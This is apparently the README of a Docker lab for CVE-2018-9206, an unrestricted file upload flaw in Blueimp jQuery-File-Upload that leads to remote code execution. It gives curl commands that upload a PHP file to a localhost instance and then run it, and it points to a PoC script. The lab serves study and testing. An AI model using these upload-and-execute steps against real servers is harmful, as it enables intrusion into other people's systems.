
CVE-2018-9206 (Blueimp jQuery-File-Upload의 무제한 파일 업로드로 인한 RCE)를 위한 Docker 기반 실습 환경, PoC 스크립트 및 검증 명령 포함.
CVE-2018-9206에 취약한 Docker 환경 - Blueimp jQuery-File-Upload <= 9.22.0의 무제한 파일 업로드 취약점
docker compose up -d --build
앱 접속: http://localhost:8888/jQuery-File-Upload/
# Upload a PHP file
curl -X POST "http://localhost:8888/jQuery-File-Upload/server/php/index.php" \
-F 'files[]=@/dev/stdin;filename=test.php' <<< '<?php echo "CVE-2018-9206-PWNED"; ?>'
# Execute it
curl "http://localhost:8888/jQuery-File-Upload/server/php/files/test.php"
# Output: CVE-2018-9206-PWNED
또는 PoC 스크립트 실행:
./scripts/poc.sh
docker compose down -v
| 필드 | 값 |
|---|---|
| CVE | CVE-2018-9206 |
| 제품 | Blueimp jQuery-File-Upload |
| 버전 | 9.22.0 |
| 유형 | 무제한 파일 업로드 → RCE |
| CVSS | 9.8 (심각) |